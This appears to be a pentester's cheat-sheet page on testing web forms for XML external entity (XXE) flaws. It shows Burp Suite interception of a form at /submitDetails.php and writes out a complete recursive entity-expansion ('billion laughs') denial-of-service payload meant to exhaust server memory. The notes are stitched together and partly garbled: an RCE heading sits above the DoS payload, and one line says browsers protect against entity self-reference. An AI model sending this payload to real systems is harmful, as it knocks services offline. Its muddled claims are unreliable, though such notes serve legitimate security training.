DOS
this attack no longer works on modern web servers such as Apache as modern browsers protect against entity self-reference
#once the internal XML entities are validated - use external file entities keyword to test for local file disclosure
#find web pages that accept an XML user input
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
input field: 127.0.0.1
...
* submit the expected user input
BURP > Proxy > Intercept > Raw
Request
...
POST /submitDetails.php HTTP/1.1
<?xml version="1.0" encoding="UTF-8"?>
<root>
<name>First</name>
<tel></tel>
<email>[email protected]</email>
<message>This is a test email</message>
</root>
* forms that appears to be sending user input data in an XML format can be tested for potential XXE vulnerability
- the target page may be vulnerable to XXE injection if the user input isn't properly sanitized or safely parsed
#identify which elements are being displayed IOT know which elements to injext malicious xml input
#if no elements are displayed, utilize blind xxe injection method
BURP > Repeater
Request
...
<?xml version="1.0" encoding="UTF-8"?>
<root>
<name>First</name>
<tel></tel>
<email>[email protected]</email>
<message>This is a test email</message>
</root>
Response
...
HTTP/1.1 200 OK
check your email [email protected] for verification...
* the email field is reflected in the response and may be vulnerable to xxe injection#The expect module is not enabled/installed by default on modern PHP servers, so this attack may not always work
#perform test & exploit xxe vulnerability to gain rce
BURP > Repeater
Request
...
POST /submitDetails.php HTTP/1.1
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [
<!ENTITY a0 "DOS">
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
<!ENTITY a5 "&a4;&a4;&a4;&a4;&a4;&a4;&a4;&a4;&a4;&a4;">
<!ENTITY a6 "&a5;&a5;&a5;&a5;&a5;&a5;&a5;&a5;&a5;&a5;">
<!ENTITY a7 "&a6;&a6;&a6;&a6;&a6;&a6;&a6;&a6;&a6;&a6;">
<!ENTITY a8 "&a7;&a7;&a7;&a7;&a7;&a7;&a7;&a7;&a7;&a7;">
<!ENTITY a9 "&a8;&a8;&a8;&a8;&a8;&a8;&a8;&a8;&a8;&a8;">
<!ENTITY a10 "&a9;&a9;&a9;&a9;&a9;&a9;&a9;&a9;&a9;&a9;">
]>
<root>
<name>First</name>
<tel></tel>
<email>&a10;</email>
<message>This is a test email</message>
</root>
* This payload defines the a0 entity as DOS, references it in a1
multiple times, references a1 in a2, and so on until the back-end
server's memory runs out due to the self-reference loops.
Response
...
HTTP/1.1 200 OK
check your email testCompany for verification...
...
...
* if the XML input in the HTTP request had no DTD being declared within the XML data itself, or being referenced externally,
DTD should be added before defining an entity; if the DOCTYPE is already declared in the XML request,
only the ENTITY element is requiredLast updated